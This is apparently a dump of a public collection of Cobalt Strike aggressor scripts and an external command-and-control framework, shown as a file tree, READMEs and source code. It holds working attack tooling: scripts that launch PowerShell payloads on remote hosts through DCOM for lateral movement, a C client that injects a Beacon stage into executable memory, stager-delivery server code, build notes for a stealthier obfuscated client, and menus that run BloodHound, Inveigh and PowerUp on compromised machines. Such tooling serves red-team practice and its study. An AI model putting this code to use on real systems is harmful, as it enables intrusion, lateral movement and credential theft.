├── 001SPARTaN ├── README.md ├── bot.cna ├── csfm │ ├── LICENSE │ ├── README.md │ ├── csfm.cna │ └── defs.cna ├── custom_defaults.cna ├── dcom_lateral_movement.cna ├── download_screenshots.cna ├── http.cna ├── powershell.cna ├── visualizations │ ├── logvis.cna │ └── vis.cna └── web.cna ├── README.md ├── RhinoSecurityLabs └── external_c2_framework │ ├── README.md │ └── builds │ ├── client │ └── s3 │ │ ├── c2file_dll.c │ │ ├── c2file_dll.h │ │ ├── compile_dll.sh │ │ └── s3_client.py │ ├── server │ ├── config.py │ ├── configureStage │ │ └── __init__.py │ ├── establishedSession │ │ └── __init__.py │ ├── s3_server.py │ └── utils │ │ ├── commonUtils.py │ │ ├── encoders │ │ ├── encoder_b64url.py │ │ └── encoder_base64.py │ │ └── transports │ │ └── transport_s3.py │ └── start_externalc2.cna ├── Und3rf10w ├── Ebowla │ └── ebowla-interop.cna ├── Pushover │ ├── pushover-cs │ └── pushover.cna ├── Reports │ └── knightlab-timeline.rpt ├── auto-keylogger.cna ├── external_c2_framework │ ├── README.md │ └── builds │ │ ├── client │ │ ├── gmail │ │ │ ├── c2file_dll.c │ │ │ ├── c2file_dll.h │ │ │ ├── compile_dll.sh │ │ │ └── gmail_client.py │ │ └── raw_socket │ │ │ ├── c2file_dll.c │ │ │ ├── c2file_dll.h │ │ │ ├── compile_dll.sh │ │ │ └── raw_socket_client.py │ │ ├── server │ │ ├── config.py │ │ ├── configureStage │ │ │ └── __init__.py │ │ ├── establishedSession │ │ │ └── __init__.py │ │ ├── sample_server-gmail.py │ │ ├── sample_server-raw_socket.py │ │ └── utils │ │ │ ├── commonUtils.py │ │ │ ├── encoders │ │ │ ├── encoder_b64url.py │ │ │ └── encoder_base64.py │ │ │ └── transports │ │ │ ├── transport_gmail.py │ │ │ └── transport_raw_socket.py │ │ └── start_externalc2.cna ├── inveigh │ └── inveigh.cna ├── kits │ ├── AnnoyKit │ │ ├── AnnoyKit.cna │ │ └── scripts │ │ │ ├── Open-HiddenInternetExplorer.ps1 │ │ │ └── annoySongs │ │ │ ├── Play-ImperialMarch.ps1 │ │ │ ├── Play-RickAstley.ps1 │ │ │ └── Play-TetrisTune.ps1 │ ├── AntiForensicsKit │ │ ├── AntiForensicsKit.cna │ │ └── scripts │ │ │ ├── Block-CarbonBlack.ps1 │ │ │ ├── Check-VM.ps1 │ │ │ └── Invoke-Phant0m.ps1 │ ├── CredKit │ │ ├── CredKit.cna │ │ └── scripts │ │ │ ├── Get-ChromePasswords.ps1 │ │ │ ├── Get-FirefoxPasswords.ps1 │ │ │ ├── Get-VaultCredential.ps1 │ │ │ ├── Invoke-mimikittenz.ps1 │ │ │ ├── KeePassConfig.ps1 │ │ │ └── KeeThief.ps1 │ ├── DebugKit │ │ └── DebugKit.cna │ ├── EnumKit │ │ ├── EnumKit.cna │ │ └── scripts │ │ │ ├── BloodHound.ps1 │ │ │ ├── Get-MicrophoneAudio.ps1 │ │ │ └── PowerView.ps1 │ ├── KitLoader.cna │ ├── PersistKit │ │ ├── PersistKit.cna │ │ └── scripts │ │ │ ├── Invoke-ADSBackdoor.ps1 │ │ │ └── Persist-Poweliks.ps1 │ ├── PrivescKit │ │ ├── PrivescKit.cna │ │ └── scripts │ │ │ ├── LinEnum.sh │ │ │ ├── PowerUp.ps1 │ │ │ └── unix-privesc-check │ └── ThirdParty │ │ └── thirdparty.cna └── webservice.sl ├── ZonkSec ├── README.md └── persistence.cna ├── bluscreenofjeff ├── Beaconpire │ ├── README.md │ └── beaconpire.cna ├── CCDC │ ├── Clippy Setup Instructions.txt │ ├── lulz.cna │ ├── misc.cna │ └── sysinternal-killer.cna ├── LICENSE ├── OPSEC Profiles │ ├── README.md │ ├── cmd-execution.cna │ ├── powershell.cna │ ├── process-execution.cna │ ├── process-injection.cna │ ├── service-creation.cna │ └── template.cna ├── README.md ├── apache-style-weblog-output.cna ├── beacon_to_empire.cna ├── beaconestablishednote.cna ├── beaconid_note.cna ├── checkin_jobs_context.cna ├── eventlog-to-slack.cna ├── forcecheckin.cna ├── mass-dcsync.cna ├── mimikatz-every-30m.cna ├── mimikatz-timestamp-note-BETA.cna ├── ping_aliases.cna ├── powershell.cna ├── ps-window-alias.cna ├── silver-tickets.cna ├── slack-notify-beacon.cna ├── slack-notify-webhit.cna ├── sleep-down-when-no-operators.cna ├── sleeptimer.cna ├── stale-beacon-notifier.cna └── timestamped_activitylog_export.cna ├── harleyQu1nn ├── AVQuery.cna ├── All_In_One.cna ├── ArtifactPayloadGenerator.cna ├── CertUtilWebDelivery.cna ├── EDR.cna ├── Logging │ ├── Logger.cna │ ├── README.md │ ├── av_hips_executables.txt │ └── logs.py ├── Persistence │ ├── HKCURunKeyPSRegistryPersist.cna │ ├── HKLMRunKeyPSRegistryPersist.cna │ ├── Persistence_Menu.cna │ ├── README.md │ ├── RegistryPersist.cna │ ├── ServiceEXEPersist.cna │ ├── StartUpFolderPersist.cna │ ├── StartupGPOPersist.cna │ ├── UserSchtasksPersist.cna │ ├── WMICEventPersist.cna │ └── WMIEventPersist.cna ├── ProcessColor.cna ├── ProcessMonitor.cna ├── ProcessMonitor.ps1 ├── README.md ├── RedTeamRepo.cna └── logvis.cna ├── killswitch-GUI ├── CheckLAdminContext.ps1 ├── DA-Watch.cna ├── Initial-DACheck.cna ├── Initial-LAdminCheck.cna ├── Invoke-DACheck.ps1 ├── LICENSE ├── README.md └── host │ └── dnscheckin.cna ├── ramen0x3f ├── LICENSE ├── README.md ├── cdolla.cna ├── compromised_log.rpt ├── credpocalypse.cna ├── save_log.cna └── utils.cna ├── rasta-mouse ├── DDEAutoCS │ ├── LICENSE │ ├── README.md │ ├── ddeauto.cna │ └── img │ │ ├── Git.png │ │ └── Git2.png ├── README.md ├── elevate │ ├── README.md │ ├── elevate.cna │ └── modules │ │ ├── Invoke-MS16032.ps1 │ │ ├── Invoke-MS16135.ps1 │ │ ├── cve-2015-1701.x64.dll │ │ ├── cve-2015-1701.x86.dll │ │ └── cve-2016-0051.x86.dll ├── loader.cna └── persistence │ ├── README.md │ ├── images │ ├── hkcu_psh.png │ └── service.png │ ├── modules │ ├── Invoke-ServicePersistence.ps1 │ └── PSReflect.ps1 │ └── persistence.cna ├── rvrsh3ll ├── AVQuery.cna ├── All_In_One.cna ├── ArtifactPayloadGenerator.cna ├── CertUtilWebDelivery.cna ├── Logging │ ├── Logger.cna │ ├── README.md │ ├── av_hips_executables.txt │ └── logs.py ├── Persistence │ ├── HKCURunKeyPSRegistryPersist.cna │ ├── HKLMRunKeyPSRegistryPersist.cna │ ├── Persistence_Menu.cna │ ├── README.md │ ├── RegistryPersist.cna │ ├── ServiceEXEPersist.cna │ ├── StartUpFolderPersist.cna │ ├── StartupGPOPersist.cna │ ├── UserSchtasksPersist.cna │ ├── WMICEventPersist.cna │ └── WMIEventPersist.cna ├── ProcessColor.cna ├── ProcessMonitor.cna ├── ProcessMonitor.ps1 ├── README.md └── RedTeamRepo.cna ├── tevora-threat ├── PowerView.cna └── README.md └── vysec ├── ANGRYPUPPY ├── ANGRYPUPPY.cna ├── Install.ps1 ├── Install.sh ├── LICENSE ├── README.md ├── com-exec.cna ├── cypher.cna ├── eventspy.cna ├── json │ ├── LICENSE │ └── json.jar └── utils.cna ├── Blacklist.cna ├── CACTUSTORCH ├── CACTUSTORCH.cna ├── CACTUSTORCH.cs │ └── TestClass.cs ├── CACTUSTORCH.hta ├── CACTUSTORCH.js ├── CACTUSTORCH.jse ├── CACTUSTORCH.sct ├── CACTUSTORCH.vba ├── CACTUSTORCH.vbe ├── CACTUSTORCH.vbs ├── README.md ├── banner.txt └── splitvba.py ├── Invoke-CredLeak.ps1 ├── Invoke-Vnc.ps1 ├── README.md ├── auto-keylog-consent.cna ├── auto-prepenv.cna ├── credleak.cna ├── http.cna ├── mimikatz_addons.cna ├── ping.cna ├── portfwd.cna ├── pushover-ng.cna ├── test.cna ├── virustotal-ng.cna └── vnc-psh.cna /001SPARTaN/README.md: -------------------------------------------------------------------------------- 1 | # aggressor_scripts 2 | A collection of useful scripts for Cobalt Strike 3 | 4 | This repository will contain all the aggressor scripts that I feel are useful enough to warrant making public. 5 | 6 | **powershell.cna** is a script to import and run some commonly used Powershell tools via a Beacon menu or from the Beacon console. 7 | 8 | **bot.cna** is a little chat bot for the Cobalt Strike event log. Commands include !ping, !beacons, !listeners, !elevate, !screenshot, !downloadstring and !psexec. NOTE: This is intended to be run headless (with ./agscript). 9 | 10 | **dcom_lateral_movement.cna** is an implementation of enigma0x3's research into code execution via DCOM. 11 | https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ 12 | https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ 13 | 14 | **ElevateKit** is forked from rsmudge, and I've added right click menu options for the privilege escalation techniques included in ElevateKit. 15 | -------------------------------------------------------------------------------- /001SPARTaN/csfm/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 001SPARTaN and r3dqu1nn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /001SPARTaN/csfm/README.md: -------------------------------------------------------------------------------- 1 | # CSFM 2 | Cobalt Strike Field Manual - A quick reference for Windows commands that can be accessed in a beacon console. 3 | 4 | # Getting started 5 | CSFM allows users to reference commands from any beacon console. Simply type `search ` into a beacon, and you'll see a list of results that match that term. 6 | 7 | Once you have identified the command you want to run, you can run the command easily with `runcmd `, where `` is the number next to the search result. 8 | 9 | # Usage 10 | CSFM has 4 different options to choose from: 11 | 12 | `search ` 13 | 14 | `tip ` 15 | 16 | `runcmd (search result)` 17 | 18 | `add` 19 | 20 | The add command will pop up a dialog window that will have fields to enter the command syntax, the description of the command, and the tags or matching search terms for that specific command you enter. Once that command is added it will populate and get stored into the file 'defs.bin' for later use on future engagements. 21 | 22 | Any questions or issues please post here: https://github.com/001SPARTaN/csfm/issues or feel free to reach out to @r3dQu1nn or @001SPARTaN. 23 | 24 | ![image](https://user-images.githubusercontent.com/27856212/32573478-576bf1e4-c48b-11e7-8b06-d56a47f93c6e.png) 25 | ![csfm2](https://user-images.githubusercontent.com/27856212/32573605-c7422416-c48b-11e7-953c-98b6a6fd2ce5.PNG) 26 | ![screenshot](https://i.imgur.com/KhjRYzh.png) 27 | -------------------------------------------------------------------------------- /001SPARTaN/custom_defaults.cna: -------------------------------------------------------------------------------- 1 | # Some of my defaults for Cobalt Strike. 2 | # 001SPARTaN 3 | 4 | # Keyboard shortcuts 5 | bind Meta+Right { 6 | nextTab(); 7 | } 8 | 9 | bind Meta+Left { 10 | previousTab(); 11 | } 12 | 13 | bind Ctrl+Tab { 14 | nextTab(); 15 | } 16 | 17 | # Load scripts 18 | include(script_resource("powershell.cna")); 19 | include(script_resource("ElevateKit/elevate.cna")); 20 | 21 | # Change default event log 22 | set EVENT_SBAR_RIGHT { 23 | # Add number of beacons to event log status bar 24 | $beacons = size(beacons()); 25 | return "[\c9Beacons: $beacons\o | lag: $1 $+ ]"; 26 | } 27 | 28 | on beacon_initial { 29 | if (-isadmin $1) { 30 | exec("say -v Fiona 'New admin beacon!'"); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /001SPARTaN/dcom_lateral_movement.cna: -------------------------------------------------------------------------------- 1 | # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) 2 | # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ 3 | # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ 4 | # Beacon implementation based on comexec.cna by Raphael Mudge 5 | # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 6 | 7 | # Register alias 8 | beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", 9 | "Usage: dcom_shellexecute [target] [listener]\n\n" . 10 | "Spawn new Beacon on a target via DCOM ShellExecute Object."); 11 | 12 | # Alias for dcom_shellexecute 13 | alias dcom_shellexecute { 14 | if ($3 is $null) { 15 | # If no listener specified, allow user to choose 16 | openPayloadHelper(lambda({ 17 | dcom_shellexecute($bid, $target, $1); 18 | }, $bid => $1, $target => $2)); 19 | } 20 | else { 21 | dcom_shellexecute($1, $2, $3); 22 | } 23 | } 24 | 25 | sub dcom_shellexecute { 26 | local('$payload $cmd'); 27 | 28 | # Acknowledge task 29 | btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM ShellExecute"); 30 | 31 | # Generate PowerShell one-liner for payload 32 | $payload = powershell($3, true, "x86"); 33 | $payload = strrep($payload, "powershell.exe ", ""); 34 | 35 | # Create new DCOM ShellExecute object on remote host 36 | $cmd = '[Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "'; 37 | $cmd .= $2; 38 | $cmd .= '")).Item().Document.Application.ShellExecute("powershell.exe", "'; 39 | $cmd .= $payload; 40 | $cmd .= '", "C:\Windows\System32\WindowsPowershell\v1.0",'; 41 | $cmd .= '$null,0)'; 42 | 43 | # Use beacon_host_script to generate a shorter DownloadString 44 | # payload that we can use w/ make_token 45 | $short = beacon_host_script($1, $cmd); 46 | 47 | bpowershell($1, $short); 48 | } 49 | 50 | # DCOM Outlook remote code execution. 51 | sub dcom_outlook { 52 | local('$payload $cmd'); 53 | 54 | # Acknowledge task 55 | btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM Outlook"); 56 | 57 | # Generate PowerShell one-liner for payload 58 | $payload = powershell($3, true, "x86"); 59 | $payload = strrep($payload, "powershell.exe ", ""); 60 | 61 | $cmd = "[System.Activator]::CreateInstance([Type]::GetTypeFromProgID('Outlook.Application').CreateObject(\"ScriptControl\")"; 62 | 63 | # Use beacon_host_script to generate a shorter DownloadString 64 | # payload that we can use w/ make_token 65 | $short = beacon_host_script($1, $cmd); 66 | 67 | bpowershell($1, $short); 68 | } -------------------------------------------------------------------------------- /001SPARTaN/download_screenshots.cna: -------------------------------------------------------------------------------- 1 | # Grab all screenshots and download 2 | # 001SPARTaN 3 | 4 | sub getScreenshots { 5 | # Iterate through screenshots 6 | foreach %s (screenshots()) { 7 | # Each screenshot is stored as 8 | # %(data => , bid => , when => ) 9 | $bid = %s['bid']; 10 | # Pull computer name, timestamp so we can name files appropriately 11 | $computer = binfo($bid, "computer"); 12 | $timestamp = %s['when']; 13 | # Pull data so that we can write to file 14 | $data = %s['data']; 15 | 16 | # Filename is COMPUTERNAME_TIMESTAMP.jpg 17 | $fname = $computer . "_" . $timestamp . ".jpg"; 18 | # Open file for writing as $handle 19 | # Change to whatever directory you want (e.g. '>engagement/screenshots/$fname') 20 | $handle = openf(">$fname"); 21 | # Write $data to the file handle 22 | writeb($handle, $data); 23 | # Close file handle 24 | closef($handle); 25 | println("Saving screenshot: " . $fname); 26 | } 27 | } 28 | 29 | # Add item to the "Cobalt Strike" menu 30 | popup aggressor { 31 | item "Download Screenshots" { 32 | getScreenshots(); 33 | } 34 | } -------------------------------------------------------------------------------- /001SPARTaN/http.cna: -------------------------------------------------------------------------------- 1 | # http.cna 2 | # utilities for http requests from Aggressor scripts 3 | # 001SPARTaN 4 | 5 | sub http_get { 6 | local('$output'); 7 | $url = [new java.net.URL: $1]; 8 | $stream = [$url openStream]; 9 | $handle = [SleepUtils getIOHandle: $stream, $null]; 10 | 11 | @content = readAll($handle); 12 | 13 | foreach $line (@content) { 14 | $output .= $line . "\r\n"; 15 | } 16 | 17 | println($output); 18 | } 19 | 20 | http_get("https://ipinfo.io/json"); 21 | 22 | sub http_post { 23 | local('$output'); 24 | $url = [new java.net.URL: $1]; 25 | $conn = [$url openConnection]; 26 | [$conn setDoOutput: true]; 27 | $payload = "testing"; 28 | println("Payload: $payload"); 29 | println("Content-Length: " . strlen($payload)); 30 | [$conn setRequestProperty: "Content-Length", strlen($payload)]; 31 | [$conn setRequestProperty: "Content-Type", "text/plain"]; 32 | 33 | $handle = [SleepUtils getIOHandle: [$conn getInputStream], [$conn getOutputStream]]; 34 | 35 | println($handle, $payload); 36 | 37 | @content = readAll($handle); 38 | 39 | foreach $line (@content) { 40 | $output .= $line . "\r\n"; 41 | } 42 | 43 | println($output); 44 | } 45 | 46 | http_post("http://localhost/test?param=param1"); -------------------------------------------------------------------------------- /001SPARTaN/powershell.cna: -------------------------------------------------------------------------------- 1 | # This Aggressor script loads some commonly used PowerShell tools, and adds menu bindings 2 | # 001SPARTaN 3 | 4 | #### RECON 5 | 6 | ## BloodHound 7 | 8 | # Run BloodHound with default settings 9 | sub bloodhound { 10 | bpowershell_import($1, script_resource("scripts/BloodHound.ps1")); # Change path to suit 11 | bcd($1, "C:\\Temp"); 12 | bpowershell($1, "Invoke-BloodHound"); 13 | } 14 | 15 | # Collect only sessions 16 | sub bloodhoundSessionsOnly { 17 | bpowershell_import($1, script_resource("scripts/BloodHound.ps1")); 18 | bcd($1, "C:\\Temp"); 19 | bpowershell($1, "Invoke-BloodHound -CollectionMethod Session"); 20 | } 21 | 22 | # Alias to run BloodHound from Beacon quickly 23 | alias bloodhound { 24 | bloodhound($1); 25 | } 26 | 27 | # Alias to run BloodHound session collection 28 | alias bloodhound_sessions { 29 | sessionsOnly($1); 30 | } 31 | 32 | ## Inveigh 33 | 34 | # Run Invoke-Inveigh for 60 minutes 35 | sub inveigh { 36 | local('$bid'); 37 | $bid = $1; 38 | bpowershell_import($bid, script_resource("scripts/Inveigh.ps1")); 39 | bcd($bid, "C:\\Temp"); 40 | bpowershell($bid, "Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -RunTime 60"); 41 | } 42 | 43 | alias inveigh { 44 | inveigh($1); 45 | } 46 | 47 | sub sessionGopher { 48 | local('$bid'); 49 | $bid = $1; 50 | bpowershell_import($bid, script_resource("scripts/SessionGopher.ps1")); 51 | bcd($bid, "C:\\Temp"); 52 | bpowershell($bid, "Invoke-SessionGopher -o"); 53 | } 54 | 55 | alias session_gopher { 56 | session_gopher($1); 57 | } 58 | 59 | #### PRIVESC 60 | # Run PowerUp Invoke-AllChecks 61 | sub powerup { 62 | bpowershell_import($1, script_resource("scripts/PowerUp.ps1")); 63 | bpowershell($1, "Invoke-AllChecks"); 64 | } 65 | 66 | alias powerup { 67 | powerup($1); 68 | } 69 | 70 | # Add bindings to Beacon menu 71 | popup beacon_bottom { 72 | menu "P&owershell" { 73 | menu "&Recon" { 74 | item "BloodHound" { 75 | local('$bid'); 76 | foreach $bid ($1) { 77 | bloodhound ($bid); 78 | } 79 | } 80 | item "BloodHound (Sessions)" { 81 | local('$bid'); 82 | foreach $bid ($1) { 83 | bloodhoundSessionsOnly($bid); 84 | } 85 | } 86 | separator(); 87 | item "Inveigh" { 88 | local('$bid'); 89 | foreach $bid ($1) { 90 | inveigh($bid); 91 | } 92 | } 93 | separator(); 94 | item "SessionGopher" { 95 | local ('$bid'); 96 | foreach $bid ($1) { 97 | sessionGopher($bid) 98 | } 99 | } 100 | } 101 | menu "&PrivEsc" { 102 | item "PowerUp" { 103 | local ('$bid'); 104 | foreach $bid ($1) { 105 | powerup($bid); 106 | } 107 | } 108 | } 109 | } 110 | } 111 | -------------------------------------------------------------------------------- /001SPARTaN/visualizations/vis.cna: -------------------------------------------------------------------------------- 1 | # vis.cna 2 | # Experimenting with custom visualizations in Aggressor Script 3 | # Doesn't really do much right now 4 | # @001SPARTaN 5 | 6 | import java.awt.*; 7 | import java.awt.event.*; 8 | import javax.swing.*; 9 | import javax.swing.event.*; 10 | import javax.swing.table.*; 11 | 12 | import ui.*; 13 | import table.*; 14 | 15 | 16 | global('$model $console'); 17 | 18 | sub updateHosts { 19 | fork({ 20 | local('$entry'); 21 | 22 | # Clear the model so we can put new stuff in it. 23 | [$model clear: 256]; 24 | 25 | foreach $b (beacons()) { 26 | %entry["user"] = $b['user']; 27 | %entry["host"] = $b['computer']; 28 | %entry["bid"] = $b['id']; 29 | # Add the new entry to $model 30 | [$model addEntry: %entry]; 31 | } 32 | # Update with the new table 33 | [$model fireListeners]; 34 | }, \$model); 35 | } 36 | 37 | sub updateConsole { 38 | $msg = $1; 39 | # Append our message to $console 40 | [$console append: $msg]; 41 | } 42 | 43 | sub createVisualization { 44 | # GenericTableModel from table.* 45 | $model = [new GenericTableModel: @("user", "host", "bid"), "bid", 16]; 46 | 47 | # Create a table from the GenericTableModel 48 | $table = [new ATable: $model]; 49 | 50 | # Controls how the column headers will sort the table 51 | $sorter = [new TableRowSorter: $model]; 52 | [$sorter toggleSortOrder: 0]; 53 | # We have to use cmp for comparing user, because it's a text string 54 | [$sorter setComparator: 0, { 55 | return $1 cmp $2; 56 | }]; 57 | # Builtin compareHosts function allows us to sort by host 58 | [$sorter setComparator: 1, &compareHosts]; 59 | # <=> works fine to compare bid, because they're just numbers 60 | [$sorter setComparator: 2, { 61 | return $1 <=> $2; 62 | }]; 63 | 64 | # Set $sorter as the row sorter for $table 65 | [$table setRowSorter: $sorter]; 66 | 67 | # console.Display from ui.* 68 | # Because it looks better than a boring text area 69 | $console = [new console.Display]; 70 | 71 | # Create a split pane (divider you can drag around) 72 | $content = [new JSplitPane: [JSplitPane HORIZONTAL_SPLIT], [new JScrollPane: $table], $console]; 73 | 74 | # Make spacing look nice by adjusting the split location 75 | [$content setDividerLocation: 450]; 76 | 77 | updateHosts(); 78 | 79 | # Register the visualization with CS 80 | addVisualization("Custom", $content); 81 | } 82 | 83 | createVisualization(); 84 | 85 | on beacon_initial { 86 | updateHosts(); 87 | $user = beacon_info($1, "user"); 88 | $host = beacon_info($1, "computer"); 89 | updateConsole("[BEACON] - ID: \c3$1\c\n"); 90 | updateConsole("[BEACON] - USER: \c3$user\c\n"); 91 | } 92 | 93 | on web_hit { 94 | updateConsole("[WEB] - Source: \c4$3\c\n"); 95 | } 96 | 97 | # Add an item to the View menu to show our new visualization 98 | popup view { 99 | item "Custom" { 100 | # Show the visualization 101 | showVisualization("Custom"); 102 | } 103 | } -------------------------------------------------------------------------------- /001SPARTaN/web.cna: -------------------------------------------------------------------------------- 1 | # web.cna 2 | 3 | $template = ""; 4 | 5 | sub loadTemplate { 6 | $handle = openf(script_resource("test.html")); 7 | @array = readAll($handle); 8 | closef($handle); 9 | 10 | foreach $line (@array) { 11 | println($line); 12 | $template .= $line . "\n"; 13 | } 14 | 15 | println("Loaded template."); 16 | } 17 | 18 | sub hostPage { 19 | $page = $template; 20 | %replace = %( 21 | TEST => "Whee!", 22 | asdf => "Bleh" 23 | ); 24 | 25 | foreach $key (keys(%replace)) { 26 | $value = %replace["$key"]; 27 | println("Replacing $key with $value"); 28 | $page = replace($page, "##$key\#\#", $value); 29 | } 30 | 31 | site_kill(80, "/test"); 32 | site_host(localip(), 80, "/test", $page, "text/html", "Testing", false); 33 | } 34 | 35 | loadTemplate(); 36 | hostPage(); -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/client/s3/c2file_dll.c: -------------------------------------------------------------------------------- 1 | /* a quick-client for Cobalt Strike's External C2 server based on code from @armitagehacker */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #define PAYLOAD_MAX_SIZE 512 * 1024 8 | #define BUFFER_MAX_SIZE 1024 * 1024 9 | 10 | 11 | /* read a frame from a handle */ 12 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) { 13 | DWORD size = 0, temp = 0, total = 0; 14 | /* read the 4-byte length */ 15 | ReadFile(my_handle, (char * ) & size, 4, & temp, NULL); 16 | 17 | /* read the whole thing in */ 18 | while (total < size) { 19 | // xychix added 1 line 20 | Sleep(3000); 21 | ReadFile(my_handle, buffer + total, size - total, & temp, NULL); 22 | total += temp; 23 | } 24 | return size; 25 | } 26 | 27 | /* write a frame to a file */ 28 | DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length) { 29 | DWORD wrote = 0; 30 | printf("in write_frame we have: %s",buffer); 31 | WriteFile(my_handle, (void * ) & length, 4, & wrote, NULL); 32 | return WriteFile(my_handle, buffer, length, & wrote, NULL); 33 | //return wrote; 34 | } 35 | 36 | HANDLE start_beacon(char * payload, unsigned int pylen){ 37 | DWORD length = (DWORD) pylen; 38 | /* inject the payload stage into the current process */ 39 | char * payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 40 | memcpy(payloadE, payload, length); 41 | printf("Injecting Code, %d bytes\n", length); 42 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL); 43 | /* 44 | * connect to our Beacon named pipe */ 45 | HANDLE handle_beacon = INVALID_HANDLE_VALUE; 46 | while (handle_beacon == INVALID_HANDLE_VALUE) { 47 | handle_beacon = CreateFileA("\\\\.\\pipe\\foobar", 48 | GENERIC_READ | GENERIC_WRITE, 49 | 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL); 50 | 51 | } 52 | return(handle_beacon); 53 | } -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/client/s3/c2file_dll.h: -------------------------------------------------------------------------------- 1 | #ifndef c2file_H__ 2 | #define c2file_H__ 3 | 4 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) 5 | void write_frame(HANDLE my_handle, char * buffer, DWORD length) 6 | HANDLE start_beacon(char * payload, DWORD length) 7 | 8 | #endif -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/client/s3/compile_dll.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | i686-w64-mingw32-gcc -shared c2file_dll.c -o c2file.dll 3 | python -m PyInstaller -F -r c2file.dll s3_client.py 4 | echo '[=] Complete. Distribute dist/s3_client.exe to clients as required.' 5 | echo '-----------------------' 6 | echo '| NOTE |' 7 | echo '----------------------' 8 | echo 'This is compiled unobfuscated. To create a more stealthy version, use:' 9 | echo 'python -m PyInstaller --no-console --key=SomeSixteenChars -F -r c2file.dll s3_client.py' 10 | echo -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/config.py: -------------------------------------------------------------------------------- 1 | # TODO: Have a proper function that reads in a config 2 | 3 | # DEBUG: 4 | ############################################ 5 | ############################################ 6 | # Address of External c2 server 7 | EXTERNAL_C2_ADDR = "127.0.0.1" 8 | 9 | # Port of external c2 server 10 | EXTERNAL_C2_PORT = "2222" 11 | 12 | # The name of the pipe that the beacon should use 13 | C2_PIPE_NAME = "foobar" 14 | 15 | # A time in milliseconds that indicates how long the External C2 server should block when no new tasks are available 16 | C2_BLOCK_TIME = 100 17 | 18 | # Desired Architecture of the Beacon 19 | C2_ARCH = "x86" 20 | 21 | # How long to wait (in seconds) before polling the server for new tasks/responses 22 | IDLE_TIME = 5 23 | 24 | ENCODER_MODULE = "encoder_b64url" 25 | TRANSPORT_MODULE = "transport_s3" 26 | 27 | ########################################### 28 | # DEBUG: 29 | 30 | # Anything taken in from argparse that you want to make avaialable goes here: 31 | verbose = False 32 | debug = False -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/configureStage/__init__.py: -------------------------------------------------------------------------------- 1 | import config 2 | from utils import commonUtils 3 | 4 | def configureOptions(sock, arch, pipename, block): 5 | # This whole function should eventually be refactored into an elaborate forloop so that we can 6 | # support additional beacon options down the road 7 | # send the options 8 | if config.verbose: 9 | print commonUtils.color("Configuring stager options") 10 | 11 | beacon_arch = "arch=" + str(arch) 12 | if config.debug: 13 | print commonUtils.color(beacon_arch, status=False, yellow=True) 14 | commonUtils.sendFrameToC2(sock, beacon_arch) 15 | 16 | beacon_pipename = "pipename=" + str(pipename) 17 | if config.debug: 18 | print commonUtils.color(beacon_pipename, status=False, yellow=True) 19 | commonUtils.sendFrameToC2(sock, beacon_pipename) 20 | 21 | beacon_block = "block=" + str(block) 22 | if config.debug: 23 | print commonUtils.color(beacon_block, status=False, yellow=True) 24 | commonUtils.sendFrameToC2(sock, beacon_block) 25 | 26 | def requestStager(sock): 27 | commonUtils.sendFrameToC2(sock, "go") 28 | 29 | stager_payload = commonUtils.recvFrameFromC2(sock) 30 | 31 | return stager_payload 32 | 33 | def loadStager(sock, beaconId): 34 | # Send options to the external_c2 server 35 | configureOptions(sock, config.C2_ARCH, config.C2_PIPE_NAME, config.C2_BLOCK_TIME) 36 | 37 | if config.debug: 38 | print commonUtils.color("stager configured, sending 'go'", status=False, yellow=True) 39 | 40 | # Request stager 41 | stager_payload = requestStager(sock) 42 | 43 | if config.debug: 44 | print (commonUtils.color("STAGER: ", status=False, yellow=True) + "%s") % (stager_payload) 45 | 46 | # Prep stager payload 47 | if config.verbose: 48 | print commonUtils.color("Encoding stager payload") 49 | # Trick, this is actually done during sendData() 50 | 51 | 